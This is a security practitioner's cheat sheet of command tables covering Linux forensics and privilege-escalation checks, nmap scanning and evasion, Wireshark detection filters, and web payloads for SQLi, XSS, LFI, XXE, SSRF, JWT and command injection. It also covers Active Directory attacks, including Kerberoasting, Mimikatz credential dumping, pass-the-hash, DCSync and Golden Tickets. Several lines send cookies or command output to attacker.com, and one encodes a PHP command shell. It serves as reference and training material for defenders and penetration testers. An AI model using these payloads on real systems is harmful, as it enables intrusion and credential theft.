Cheat sheets, YouTube channels, certification roadmaps, and hands-on labs — everything a security practitioner needs in one place.
| ls -la | List all files with permissions, sizes, hidden files |
| find / -name "*.conf" 2>/dev/null | Find all .conf files from root, suppress errors |
| find / -perm -4000 2>/dev/null | Find SUID binaries — privilege escalation check |
| find / -perm -2000 2>/dev/null | Find SGID binaries |
| find / -writable -type d 2>/dev/null | Find world-writable directories |
| find /home -mtime -7 -type f | Files modified in the last 7 days in /home |
| find / -size +100M 2>/dev/null | Find files larger than 100MB |
| du -sh /* 2>/dev/null | sort -rh | Disk usage per top-level dir, sorted by size |
| df -h | Disk free space, human-readable |
| ls -lai /tmp | List /tmp with inode numbers — forensics indicator |
| grep -i "error" /var/log/syslog | Case-insensitive search |
| grep -r "password" /etc/ 2>/dev/null | Recursive search for string |
| grep -v "^#" /etc/ssh/sshd_config | Show non-comment lines only |
| grep -E "^\d{1,3}(\.\d{1,3}){3}" file | Grep for IPv4 addresses |
| grep -oP '(?<=Failed password for )\w+' /var/log/auth.log | Extract failed login usernames |
| awk '{print $1}' access.log | sort | uniq -c | sort -rn | head -20 | Top 20 IPs from web log |
| awk '$9 == 200 {print $7}' access.log | sort | uniq -c | sort -rn | Top requested URLs (200 OK) |
| cut -d: -f1,3,6 /etc/passwd | Username, UID, homedir from passwd |
| sed -n '/2024-01-15/,/2024-01-16/p' app.log | Extract log lines between dates |
| strings binary | grep -E "https?://" | Extract URLs from binary file |
| id | Current user UID, GID, and groups |
| cat /etc/passwd | awk -F: '$3 == 0' | Find all root-equivalent users (UID=0) |
| cat /etc/passwd | awk -F: '$7 !~ /nologin|false/' | Users with valid login shells |
| last -a | head -20 | Recent login history with hostnames |
| lastb | head -20 | Failed login attempts (bad logins) |
| sudo -l | Current user's sudo permissions |
| cat /etc/sudoers 2>/dev/null | Sudoers file — look for NOPASSWD entries |
| getfacl file | Show ACL permissions on file |
| find / -user root -perm -4000 2>/dev/null | SUID files owned by root (privesc) |
| groups username | Groups a user belongs to |
| ps aux --sort=-%cpu | head -15 | Top CPU-consuming processes |
| ps aux --sort=-%mem | head -15 | Top memory-consuming processes |
| ps -ef --forest | Process tree with parent-child relationships |
| lsof -p PID | All open files for a specific process |
| lsof -i :80 | Process listening on port 80 |
| lsof -i TCP -n -P | grep LISTEN | All listening TCP services |
| ss -tulpn | All listening ports with process names (modern) |
| netstat -tulpn | All listening ports (older systems) |
| systemctl list-units --type=service --state=running | All running systemd services |
| journalctl -u sshd --since "1 hour ago" | SSH service logs from last hour |
| crontab -l 2>/dev/null; ls -la /etc/cron* | All cron jobs — current user + system |
| cat /etc/crontab; ls /etc/cron.d/ | System cron table and cron.d entries |
| ip addr show | All network interfaces and addresses |
| ip route show | Routing table |
| ip neigh show | ARP cache — neighbors on local network |
| dig domain.com ANY | All DNS records for a domain |
| dig -x 8.8.8.8 | Reverse DNS lookup |
| nslookup -type=TXT domain.com | TXT records (SPF, DKIM, verification) |
| curl -sI https://site.com | HTTP headers only (silent mode) |
| curl -sk https://site.com/api | python3 -m json.tool | Fetch JSON and pretty-print |
| tcpdump -i any -nn -w /tmp/cap.pcap | Capture all interfaces to file |
| tcpdump -i eth0 'port 80 or port 443' -w http.pcap | Capture only HTTP/HTTPS traffic |
| iptables -L -n -v --line-numbers | Firewall rules with line numbers and counters |
| ncat -lvp 4444 | Listen on port 4444 (netcat listener) |
| /var/log/auth.log | SSH logins, sudo usage, PAM authentication (Debian/Ubuntu) |
| /var/log/secure | Auth logs on RHEL/CentOS |
| /var/log/syslog | General system messages |
| /var/log/messages | General messages on RHEL/CentOS |
| /var/log/apache2/access.log | Apache web server access log |
| /var/log/apache2/error.log | Apache error log |
| /var/log/nginx/access.log | Nginx access log |
| /var/log/fail2ban.log | Fail2ban block actions |
| /var/log/kern.log | Kernel messages |
| /var/log/cron | Cron execution log |
| ~/.bash_history | User command history — forensics critical! |
| /root/.bash_history | Root command history |
| sha256sum file && md5sum file | Hash file for integrity verification |
| stat file | Access/modify/change timestamps (atime/mtime/ctime) |
| file suspicious_binary | Identify file type regardless of extension |
| strings -n 8 binary | grep -E "https?://" | Extract URLs from binary (min 8 chars) |
| xxd binary | head -30 | Hex dump — check magic bytes / file header |
| strace -p PID -f 2>&1 | grep -E "open|write|connect" | Trace file/network syscalls of process |
| lsmod | grep -v "$(lsmod | awk '{print $1}' | grep -f /etc/modules)" | Loaded kernel modules not in default list (rootkit check) |
| env | sort | Environment variables — check for injected values |
| mount | column -t | Mounted filesystems, formatted |
| ls -la /proc/*/exe 2>/dev/null | grep -v "^l" | Process executables — spot deleted/unusual paths |
| sudo -l | What commands can current user run as root? Check GTFOBins for exploits |
| find / -perm -4000 -type f 2>/dev/null | SUID binaries — check each against GTFOBins |
| find / -perm -2000 -type f 2>/dev/null | SGID binaries |
| getcap -r / 2>/dev/null | Linux capabilities — cap_setuid+eip is exploitable |
| cat /etc/crontab; ls /etc/cron.d/; ls /var/spool/cron/ | All cron jobs — check for writable scripts |
| find / -writable -type f 2>/dev/null | grep -v proc | World-writable files (config injection, cron abuse) |
| ps aux | grep root | Processes running as root — target for injection |
| cat /etc/exports 2>/dev/null | grep no_root_squash | NFS no_root_squash — mount and create SUID binary |
| ls -la /etc/passwd /etc/shadow /etc/sudoers | Are these files writable? Instant privilege escalation |
| cat /proc/version; uname -a | Kernel version — check for local kernel exploits (DirtyCOW etc.) |
| groups; id | Member of docker/lxd/disk/adm group? All privesc paths |
| env | grep -i "path\|ld_\|python\|perl" | PATH hijacking and library injection opportunities |
| ssh user@host -p 2222 | Connect to non-standard SSH port |
| ssh -i ~/.ssh/id_rsa user@host | Connect with private key |
| ssh -L 8080:localhost:80 user@host | Local port forward — access remote port 80 via localhost:8080 |
| ssh -R 2222:localhost:22 user@host | Remote port forward — expose local port 22 through remote server |
| ssh -D 1080 user@host | Dynamic SOCKS proxy — route traffic through SSH |
| ssh -N -f -L 5432:db-server:5432 user@jump-host | Background tunnel to reach internal DB via jump host |
| ssh-copy-id user@host | Install public key on remote host for passwordless auth |
| ssh-keygen -t ed25519 -C "label" | Generate ED25519 key pair (preferred over RSA) |
| cat /etc/ssh/sshd_config | grep -v "^#" | grep -v "^$" | Active SSH server config — check for weak settings |
| ssh -o StrictHostKeyChecking=no user@host | Skip host key verification (scripting use only) |
| ssh -J jump-user@jump-host target-user@target-host | SSH via jump host (ProxyJump) in one command |
| dpkg -l | grep -i "apache\|nginx\|openssh" | Installed packages matching pattern (Debian/Ubuntu) |
| rpm -qa --last | head -20 | Recently installed packages (RHEL/CentOS) |
| apt-get update && apt-get upgrade -y | Update and upgrade all packages (Debian/Ubuntu) |
| yum update -y | Update all packages (RHEL 7/CentOS) |
| dnf update -y | Update all packages (RHEL 8+/Fedora) |
| uname -a | Full kernel version, architecture, and build date |
| lsb_release -a | Distribution name and version |
| cat /etc/os-release | OS release info (works on all modern distros) |
| lscpu | CPU architecture, cores, sockets, cache |
| free -h | RAM and swap usage, human-readable |
| uptime | System uptime and load averages |
| timedatectl | System time, timezone, NTP status |
| for ip in $(cat ips.txt); do ping -c1 -W1 $ip &>/dev/null && echo "$ip UP"; done | Ping sweep from file |
| while read line; do curl -sI "$line" 2>/dev/null | grep "HTTP/"; echo "$line"; done < urls.txt | Check HTTP status for URLs list |
| grep -rh "Failed password" /var/log/auth.log* | awk '{print $11}' | sort | uniq -c | sort -rn | head -20 | Top brute-forced usernames from auth logs |
| grep "Accepted password\|Accepted publickey" /var/log/auth.log | awk '{print $1,$2,$3,$9,$11}' | tail -30 | Recent successful SSH logins |
| cat /var/log/apache2/access.log | awk '{print $1}' | sort | uniq -c | sort -rn | head -20 | Top visiting IPs in web logs |
| find /var/www -name "*.php" -newer /var/www/index.php -ls 2>/dev/null | PHP files newer than index — web shell detection |
| ls -lat /tmp /var/tmp /dev/shm 2>/dev/null | head -30 | Recently created files in world-writable dirs |
| ps auxww | awk '{if($11 ~ /perl|python|ruby|bash/) print}' | grep -v grep | Script interpreters running as processes |
| netstat -an 2>/dev/null | grep ESTABLISHED | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -rn | Top connected IPs by connection count |
| nmap 192.168.1.1 | Basic scan — top 1000 ports |
| nmap 192.168.1.0/24 | Scan entire subnet |
| nmap -iL targets.txt | Scan targets from file |
| nmap -p 22,80,443 host | Scan specific ports |
| nmap -p- host | All 65535 ports |
| nmap --top-ports 1000 host | Top 1000 most common ports |
| nmap -sn 192.168.1.0/24 | Ping sweep — host discovery, no port scan |
| nmap -Pn host | Skip ping, treat host as up (firewalled targets) |
| nmap -6 host | IPv6 scan |
| nmap -sS host | SYN scan — stealth, default with root, most reliable |
| nmap -sT host | TCP connect scan — no root required |
| nmap -sU -p 53,67,123,161 host | UDP scan on common UDP ports |
| nmap -sA host | ACK scan — firewall rule mapping |
| nmap -sN host | NULL scan — no flags (evades some firewalls) |
| nmap -sF host | FIN scan |
| nmap -sX host | Xmas scan — FIN, PSH, URG set |
| nmap -sW host | Window scan — distinguishes open from filtered |
| nmap -sV host | Service version detection |
| nmap -sV --version-intensity 9 host | Aggressive version detection (more probes) |
| nmap -O host | OS detection (requires root) |
| nmap -A host | Aggressive: OS + version + scripts + traceroute |
| nmap -A -T4 -p- host | Full aggressive scan all ports (common pentest combo) |
| nmap -sC host | Default safe scripts |
| nmap --script=vuln host | Vulnerability scanning scripts |
| nmap --script=auth host | Authentication bypass checks |
| nmap --script=smb-vuln-ms17-010 -p445 host | EternalBlue (MS17-010) check |
| nmap --script=smb-vuln-ms08-067 -p445 host | MS08-067 Conficker vulnerability |
| nmap --script=ssl-heartbleed -p443 host | Heartbleed OpenSSL check |
| nmap --script=http-enum -p80,443 host | Enumerate web paths and directories |
| nmap --script=http-title -p80,443,8080,8443 host | Grab HTTP page titles |
| nmap --script=ssl-cert -p443 host | SSL certificate details |
| nmap --script=dns-brute domain.com | DNS subdomain brute force |
| nmap --script=ftp-anon -p21 host | Check anonymous FTP access |
| nmap --script=banner host | Grab service banners |
| nmap --script=http-shellshock -p80 host | Shellshock CGI vulnerability |
| nmap --script=smb-enum-shares -p445 host | Enumerate SMB shares |
| nmap -T0 host | Paranoid — 5 min between probes, IDS evasion |
| nmap -T1 host | Sneaky — 15 sec between probes |
| nmap -T2 host | Polite — reduces bandwidth usage |
| nmap -T3 host | Normal (default) |
| nmap -T4 host | Aggressive — reliable networks, faster |
| nmap -T5 host | Insane — may miss open ports, high detection risk |
| nmap --min-rate 5000 -p- host | Fast full port scan (~5k pkts/sec) |
| nmap -oA scan_results host | Save in all formats (.nmap .xml .gnmap) |
| nmap -oN normal.txt host | Normal text output |
| nmap -oX results.xml host | XML output (for import into other tools) |
| nmap -v -v host | Very verbose — show open ports as discovered |
| nmap --reason host | Show reason for each port state |
| nmap -D RND:10 host | Decoy scan — 10 random fake source IPs |
| nmap -f --mtu 24 host | Fragment packets to evade DPI/IDS |
| nmap --source-port 53 host | Spoof source as port 53 (DNS bypass trick) |
| nmap --proxies socks4://127.0.0.1:9050 host | Route through SOCKS proxy (Tor) |
| nmap --scan-delay 500ms host | 500ms delay between probes |
| nmap -sn 192.168.1.0/24 -oG hosts.gnmap | Step 1: Host discovery — identify live hosts |
| grep "Up" hosts.gnmap | awk '{print $2}' > live.txt | Step 2: Extract live IPs to file |
| nmap -sV -sC -p 22,80,443,445,3389,8080 -iL live.txt -oA quick_scan | Step 3: Quick targeted scan on common ports |
| nmap -p- --min-rate 5000 -iL live.txt -oA full_scan | Step 4: Full port scan (background, takes time) |
| nmap -sV -sC -p $(grep open full_scan.gnmap | awk -F/ '{print $1}' ORS=,) -iL live.txt | Step 5: Detailed scan on only open ports found |
| nmap --script vuln -p$(open_ports) target | Step 6: Vulnerability scripts against confirmed ports |
| nmap -sU --top-ports 20 -iL live.txt | Step 7: UDP sweep on most common UDP services |
| nmap --script=smb-security-mode,smb-enum-shares,smb-enum-users -p445 host | SMB enumeration bundle |
| nmap --script=rdp-enum-encryption,rdp-vuln-ms12-020 -p3389 host | RDP encryption check + MS12-020 vuln |
| nmap --script=mysql-info,mysql-enum,mysql-empty-password -p3306 host | MySQL enumeration |
| nmap --script=ms-sql-info,ms-sql-empty-password,ms-sql-config -p1433 host | MSSQL enumeration |
| nmap --script=ssh-auth-methods,ssh-hostkey -p22 host | SSH auth methods and host keys |
| nmap --script=http-methods,http-robots.txt,http-headers -p80,443 host | HTTP methods, robots.txt, response headers |
| nmap --script=smtp-commands,smtp-enum-users -p25 host | SMTP commands and user enumeration |
| nmap --script=snmp-info,snmp-sysdescr -sU -p161 host | SNMP info (community string default: public) |
| nmap --script=ldap-rootdse -p389 host | LDAP root DSE — domain info without auth |
| nmap --script=vnc-info,vnc-title -p5900 host | VNC service info and desktop title |
| ip.addr == 192.168.1.1 | All traffic to or from this IP |
| ip.src == 10.0.0.1 | Traffic sourced from IP |
| ip.dst == 10.0.0.2 | Traffic destined to IP |
| ip.addr == 192.168.1.0/24 | Entire subnet traffic |
| !(ip.addr == 192.168.0.0/16) | Exclude all RFC1918 — external only |
| ip.ttl < 5 | Low TTL — traceroute or spoofing indicator |
| tcp.port == 443 | TCP port 443 (HTTPS) |
| tcp.port in {80 443 8080 8443} | Multiple ports — HTTP/HTTPS and alternates |
| udp.port == 53 | DNS traffic |
| not arp and not icmp and not mdns | Suppress background noise |
| http | All HTTP traffic |
| tls | TLS/HTTPS (previously ssl) |
| dns | All DNS queries and responses |
| ftp | FTP control channel |
| ftp-data | FTP data transfers |
| smtp or imap or pop | Email protocols |
| smb or smb2 | Windows file sharing (SMB v1/v2) |
| kerberos | Kerberos authentication traffic |
| rdp | Remote Desktop Protocol |
| ldap | LDAP directory queries |
| dhcp | DHCP lease requests and replies |
| icmp | ICMP ping traffic |
| http.request | All HTTP requests |
| http.response | All HTTP responses |
| http.request.method == "POST" | POST requests — forms, credentials, API data |
| http.response.code == 200 | Successful responses |
| http.response.code >= 400 | Error responses (4xx client, 5xx server) |
| http.host contains "suspicious" | Requests to specific host pattern |
| http.request.uri contains "../" | Directory traversal attempt |
| http.request.uri contains "cmd=" | Command injection in URL parameter |
| http contains "password" | HTTP traffic containing password string |
| http.cookie | Requests with session cookies |
| http.user_agent contains "sqlmap" | SQLMap scanner traffic |
| http.user_agent contains "Nmap" | Nmap HTTP script activity |
| tcp.flags.syn == 1 and tcp.flags.ack == 0 | SYN packets only — port scan detection |
| tcp.flags.reset == 1 | RST packets — connection resets, scan responses |
| tcp.flags == 0x002 | Pure SYN (hex) — aggressive port scanning |
| tcp.flags == 0x000 | NULL scan — all flags zero |
| tcp.flags == 0x029 | Xmas scan — FIN+PSH+URG set |
| tcp.analysis.retransmission | Retransmitted packets — network issues |
| tcp.stream eq 5 | Follow specific TCP stream by number |
| tcp.dstport in {4444 1337 8888 31337} | Common backdoor/C2 destination ports |
| dns.qry.name contains "evil" | DNS queries matching string |
| dns.qry.type == 1 | A record queries |
| dns.qry.type == 28 | AAAA (IPv6) queries |
| dns.qry.type == 16 | TXT record queries — C2/exfil via DNS |
| dns.qry.type == 255 | ANY queries — often recon or amplification |
| dns.resp.len > 512 | Large responses — DNS tunneling indicator |
| dns.qry.name.len > 52 | Unusually long queries — DNS tunneling |
| dns.count.answers > 10 | Many answers — DNS amplification DDoS |
| tshark -r file.pcap | Read and display pcap |
| tshark -r file.pcap -Y "http.request" | Apply display filter while reading |
| tshark -r f.pcap -T fields -e ip.src -e ip.dst -e tcp.dstport | Extract specific fields to stdout |
| tshark -i eth0 -w cap.pcap -b filesize:51200 | Capture rotating at 50MB files |
| tshark -r f.pcap -Y dns -T fields -e dns.qry.name | sort -u | All unique DNS queries |
| tshark -r f.pcap -z io,phs | Protocol hierarchy statistics |
| tshark -r f.pcap -z conv,tcp | TCP conversation statistics |
| tshark -r f.pcap -z endpoints,ip | IP endpoint statistics |
| tshark -r f.pcap -Y "http.request" -T fields -e http.host -e http.request.uri | Extract HTTP requests |
| tcp.dstport == 4444 or tcp.dstport == 1337 | Common Metasploit / C2 ports |
| http.request.method == "POST" and http.request.uri contains "/gate" | Common botnet gate POST pattern |
| dns.qry.name.len > 50 | Unusually long DNS names — likely DNS tunneling (iodine, dnscat) |
| http.user_agent == "" or http.user_agent == "-" | Empty/missing User-Agent — scripted or malware HTTP client |
| ssl.handshake.type == 1 and !(ssl.handshake.extensions_server_name) | TLS without SNI — unusual for browsers, common in C2 |
| frame.time_delta == 60 or frame.time_delta == 300 | Exact-interval beaconing — C2 check-in pattern |
| tcp.len == 0 and tcp.flags.push == 1 | PSH+empty — keepalive or C2 heartbeat |
| http.request.uri contains ".php?id=" or contains "cmd=" | Web shell interaction patterns |
| icmp.data_len > 100 | ICMP data payload larger than normal ping — ICMP tunneling |
| dns.qry.type == 16 and dns.resp.len > 200 | TXT record responses — C2 commands via DNS |
| http.authbasic | HTTP Basic Auth credentials (base64 encoded) — visible in clear text |
| ftp.request.command == "PASS" | FTP password transmitted in clear text |
| telnet.data contains "password" | Telnet session credential strings |
| smtp.data.fragment contains "password" | Credentials in SMTP DATA section |
| http.request.method == "POST" and http contains "password" | POST requests containing password field |
| kerberos.CNameString and kerberos.pvno | Kerberos AS-REQ with username — user enumeration |
| ntlmssp.auth.username | NTLM authentication username field |
| Follow → TCP Stream | Right-click packet → Follow TCP Stream to see full session content |
| File → Export Objects → HTTP | Extract all files transferred over HTTP from a PCAP |
| Statistics → Conversations → TCP | See top talkers and data volumes per connection |
| Ctrl+F | Find packet — search by string, hex, regex across all fields |
| Ctrl+G | Go to packet number |
| Ctrl+M | Mark packet — highlight for reference |
| Ctrl+D | Display filter expression builder |
| Right-click → Apply as Filter | Click any field value and instantly filter on it — fastest way to drill down |
| Statistics → Protocol Hierarchy | Visualize what protocols are present in the capture by volume |
| Statistics → IO Graph | Plot traffic volume over time — see spikes and patterns |
| Statistics → Expert Information | Quick summary of errors, warnings, notes across the capture |
| View → Time Display Format → UTC | Show timestamps in UTC — critical for correlation with logs |
| Analyze → Decode As | Force Wireshark to decode traffic as a specific protocol (e.g., non-standard ports) |
| A01 — Broken Access Control | IDOR, path traversal, privilege escalation, missing auth checks |
| A02 — Cryptographic Failures | Sensitive data in clear text, weak ciphers, no TLS, hardcoded secrets |
| A03 — Injection | SQLi, NoSQLi, OS command injection, LDAP injection, SSTI |
| A04 — Insecure Design | Missing threat modeling, no security controls in architecture |
| A05 — Security Misconfiguration | Default creds, unnecessary features, verbose error messages, open cloud storage |
| A06 — Vulnerable Components | Outdated libraries, unpatched frameworks, unverified dependencies |
| A07 — Auth & Session Failures | Weak passwords, no MFA, credential stuffing, session fixation |
| A08 — Software & Data Integrity | Insecure CI/CD, unsigned updates, deserialization flaws |
| A09 — Logging Failures | No audit trail, login events not logged, unmonitored logs |
| A10 — SSRF | Server fetches attacker-controlled URLs — cloud metadata, internal services |
| ' | Basic error trigger — look for SQL errors in response |
| ' OR '1'='1 | Classic auth bypass (WHERE clause always true) |
| ' OR 1=1 -- | Comment out rest of query (MySQL/MSSQL) |
| ' OR 1=1 # | Comment character for MySQL |
| ' UNION SELECT NULL,NULL,NULL-- | UNION-based — find number of columns |
| ' UNION SELECT username,password,NULL FROM users-- | Dump credentials via UNION |
| ' AND SLEEP(5)-- | Time-based blind SQLi (MySQL) |
| ' AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))-- | Error-based — MSSQL table enumeration |
| '; EXEC xp_cmdshell('whoami')-- | OS command via MSSQL xp_cmdshell critical |
| ' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a'-- | Boolean blind character extraction |
| <script>alert(1)</script> | Basic reflected XSS test |
| <img src=x onerror=alert(1)> | Event handler XSS (bypasses script tag filter) |
| <svg onload=alert(1)> | SVG-based XSS |
| "><script>alert(document.cookie)</script> | Break out of attribute context, steal cookies |
| javascript:alert(1) | href/src attribute context |
| <script>document.location='http://attacker.com/?c='+document.cookie</script> | Cookie exfiltration |
| <script>new Image().src='//attacker.com/?'+document.cookie</script> | Stealth cookie theft via img request |
| '-alert(1)-' | JS string context — break out of JS string |
| {{7*7}} | SSTI test — if output is 49, template injection exists |
| ../../../etc/passwd | Classic LFI — 3 levels up to root |
| ....//....//....//etc/passwd | Filter bypass — double dots + slash |
| ..%2F..%2F..%2Fetc%2Fpasswd | URL encoded traversal |
| %2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd | Double URL encoded |
| /etc/passwd%00 | Null byte termination — bypasses extension check |
| php://filter/convert.base64-encode/resource=index.php | PHP filter — read source code base64 encoded |
| data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4= | Data wrapper RFI — remote code execution |
| /proc/self/environ | LFI → RCE via environment variable injection |
| /var/log/apache2/access.log | LFI → RCE via log poisoning — inject PHP into User-Agent |
| Content-Security-Policy | Controls allowed script/style sources. default-src 'self' prevents most XSS |
| Strict-Transport-Security | Forces HTTPS. max-age=31536000; includeSubDomains; preload |
| X-Frame-Options | Clickjacking protection. Values: DENY or SAMEORIGIN |
| X-Content-Type-Options | Prevents MIME sniffing. Always set: nosniff |
| Referrer-Policy | Controls referrer info. Use: no-referrer or strict-origin |
| Permissions-Policy | Restrict browser features: camera, geolocation, microphone |
| X-XSS-Protection | Legacy header (deprecated in modern browsers, set to: 0) |
| Cache-Control | Sensitive pages: no-store, no-cache, must-revalidate |
| Ctrl+R | Send request to Repeater |
| Ctrl+I | Send request to Intruder |
| Ctrl+Shift+R | Send to Repeater and go to Repeater tab |
| Ctrl+U | URL encode selection |
| Ctrl+Shift+U | URL decode selection |
| Intercept → Action → Do intercept | Force intercept response to modify before browser receives |
| Match & Replace (Proxy Settings) | Automatically modify headers on all requests/responses |
| Intruder → Cluster Bomb | Test all combinations of multiple payloads (e.g., user+pass pairs) |
| Collaborator | Out-of-band detection for blind SSRF, XXE, blind XSS |
| Extensions → Active Scan++ | Enhanced active scanning for more vuln classes |
| <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo> | Classic XXE — read local file |
| <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/shadow">]> | Read /etc/shadow (if permissions allow) |
| <!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker.com/xxe">]> | XXE SSRF — server makes request to attacker URL |
| <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd"> %xxe;]> | Blind XXE via external DTD — OOB exfiltration |
| <!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini"> | XXE on Windows targets |
| <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> | PHP wrapper inside XXE — bypass some filters |
| Content-Type: application/xml | Change content-type to XML if app doesn't enforce JSON — may enable XXE |
| SVG file upload XXE | <svg><!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><text>&xxe;</text></svg> |
| http://localhost/admin | Access internal admin panel via SSRF |
| http://127.0.0.1/ | Loopback variant |
| http://169.254.169.254/latest/meta-data/ | AWS EC2 metadata — IAM credentials, instance info critical |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/ | AWS IAM role credentials via metadata |
| http://metadata.google.internal/computeMetadata/v1/ | GCP metadata endpoint |
| http://169.254.169.254/metadata/instance?api-version=2021-02-01 | Azure IMDS endpoint |
| http://0177.0.0.1/ or http://0x7f.0.0.1/ | 127.0.0.1 bypass: octal or hex encoding |
| http://[::1]/ | IPv6 localhost SSRF bypass |
| http://attacker.com → resolves to 127.0.0.1 | DNS rebinding — register domain pointing to 127.0.0.1 |
| file:///etc/passwd | Local file read via SSRF (if file:// scheme allowed) |
| dict://localhost:6379/info | SSRF to Redis — can lead to RCE |
| eyJ... (base64) | JWTs start with eyJ — always three dot-separated base64url sections |
| Algorithm: "none" | Change alg to "none", remove signature — some libraries accept it |
| RS256 → HS256 | If server uses RS256 public key, switch to HS256 and sign with the public key as secret |
| Weak secret brute force | hashcat -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt |
| jwt_tool.py JWT -M at | JWT Tool automated tests — all common attacks |
| Modify payload claims | Decode header+payload (base64), change role/sub/exp, re-sign with cracked secret |
| kid header injection | If kid is SQL table name: kid = "' UNION SELECT 'attackersecret'-- " → sign with that value |
| jku/x5u header injection | Point jku to attacker-controlled URL hosting malicious JWK set |
| exp claim | Set exp to far future (Unix timestamp) to create non-expiring token |
| ; whoami | Semicolon — run second command regardless of first |
| && whoami | Execute only if first command succeeds |
| || whoami | Execute only if first command fails |
| | whoami | Pipe output of first to second |
| `whoami` | Backtick subshell execution |
| $(whoami) | $() subshell — more portable than backticks |
| %0a whoami | URL-encoded newline — inject into HTTP parameters |
| whoami%0d%0a | CRLF injection combined with command injection |
| ping -c1 attacker.com | Blind injection test — observe DNS/ICMP at attacker side |
| curl http://attacker.com/$(whoami) | OOB data exfil from blind command injection |
| w'h'o'a'm'i or wh""oami | Quote insertion — bypass simple string filters |
| net user /domain | List all domain users |
| net group /domain | List all domain groups |
| net group "Domain Admins" /domain | Members of Domain Admins |
| net localgroup administrators | Local admin group members |
| nltest /domain_trusts | List domain trusts |
| nltest /dclist:DOMAIN | List domain controllers |
| set logonserver | Current logon server / DC |
| whoami /all | Current user SID, groups, privileges |
| gpresult /R | Applied Group Policy summary |
| wmic computersystem get name,domain,username | Computer domain and current user via WMI |
| Import-Module .\PowerView.ps1 | Load PowerView |
| Get-Domain | Current domain info |
| Get-DomainUser | select samaccountname,description | All users with descriptions (check for passwords!) |
| Get-DomainUser -SPN | Users with Service Principal Names — Kerberoasting targets |
| Get-DomainUser -PreauthNotRequired | AS-REP Roasting targets (no Kerberos preauth) |
| Get-DomainGroup -Identity "Domain Admins" | select member | Domain Admin group members |
| Get-DomainComputer | select dnshostname,operatingsystem | All domain computers with OS |
| Find-LocalAdminAccess | Find hosts where current user has local admin noisy |
| Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs | ACLs on Domain Admins group |
| Find-InterestingDomainShareFile -Include "*.txt","*.xml","*.ini" | Search shares for interesting files |
| GetUserSPNs.py DOMAIN/user:pass -dc-ip DC_IP | Impacket — list Kerberoastable accounts |
| GetUserSPNs.py DOMAIN/user:pass -dc-ip DC_IP -request | Request TGS tickets for all SPNs |
| GetUserSPNs.py DOMAIN/user:pass -dc-ip DC_IP -outputfile hashes.txt | Save hashes to file for cracking |
| Invoke-Kerberoast -OutputFormat Hashcat | fl | PowerView — request TGS tickets |
| hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt | Crack TGS-REP (Kerberoast hashes) |
| hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule | With rule-based mutations |
| GetNPUsers.py DOMAIN/ -usersfile users.txt -dc-ip DC_IP | Test users for no preauth (no creds needed) |
| GetNPUsers.py DOMAIN/user:pass -dc-ip DC_IP -request | With valid creds — enumerate and grab hashes |
| Get-DomainUser -PreauthNotRequired | select samaccountname | PowerView — find vulnerable accounts |
| hashcat -m 18200 asrep_hashes.txt rockyou.txt | Crack AS-REP hashes (mode 18200) |
| sekurlsa::logonpasswords | Mimikatz — dump LSASS credentials and hashes |
| sekurlsa::pth /user:USER /domain:DOMAIN /ntlm:HASH /run:cmd.exe | Mimikatz — Pass-the-Hash spawn shell |
| psexec.py DOMAIN/USER@TARGET -hashes :NTLM_HASH | Impacket PsExec with hash |
| wmiexec.py DOMAIN/USER@TARGET -hashes :NTLM_HASH | Impacket WMIExec with hash |
| smbexec.py DOMAIN/USER@TARGET -hashes :NTLM_HASH | Impacket SMBExec with hash |
| sekurlsa::tickets /export | Mimikatz — export Kerberos tickets (.kirbi files) |
| kerberos::ptt ticket.kirbi | Mimikatz — inject ticket into session (PtT) |
| rubeus.exe ptt /ticket:base64_ticket | Rubeus — Pass-the-Ticket |
| lsadump::dcsync /domain:DOMAIN /user:krbtgt | Mimikatz DCSync — get krbtgt hash (Golden Ticket) |
| lsadump::dcsync /domain:DOMAIN /all /csv | Dump all domain hashes via DCSync |
| secretsdump.py DOMAIN/USER@DC_IP -hashes :HASH | Impacket — remote hash dump via DCSync |
| kerberos::golden /user:Administrator /domain:DOMAIN /sid:S-1-5-21-... /krbtgt:HASH /id:500 | Mimikatz — create Golden Ticket persistence |
| kerberos::silver /service:cifs/target /domain:DOMAIN /sid:SID /target:TARGET /rc4:HASH | Silver Ticket for specific service |
| Get-DomainObjectAcl -SearchBase "DC=domain,DC=com" -Rights DCSync | Find accounts with DCSync rights |
| SharpHound.exe -c All --zipfilename bh.zip | Collect all data types — users, groups, sessions, ACLs, trusts |
| SharpHound.exe -c DCOnly | Fast DC-only collection — less noisy |
| Invoke-BloodHound -CollectionMethod All -ZipFilename bh.zip | PowerShell version via PowerSploit |
| bloodhound-python -u user -p pass -d DOMAIN -ns DC_IP -c All | Linux BloodHound collector (no agent needed on target) |
| Shortest Paths to Domain Admins | BloodHound query — find attack path from owned user to DA |
| Find Principals with DCSync Rights | Pre-built query — who can perform DCSync without being DA |
| Find Computers with Unconstrained Delegation | Computers with this flag can capture TGTs — high value targets |
| Find AS-REP Roastable Users | Pre-built query in BloodHound Analysis tab |
| Mark nodes as Owned | Right-click → Mark as Owned — BloodHound highlights paths from owned nodes |
| psexec.py DOMAIN/user:pass@target | Impacket PsExec — creates PSEXESVC service, drops binary to ADMIN$ |
| wmiexec.py DOMAIN/user:pass@target | WMI exec — uses WMI, no service created, semi-interactive shell |
| smbexec.py DOMAIN/user:pass@target | SMB exec — uses a service but no binary written to disk |
| atexec.py DOMAIN/user:pass@target "whoami" | At/Task Scheduler execution via SMB |
| evil-winrm -i target -u user -p pass | WinRM shell (port 5985) — PowerShell remoting |
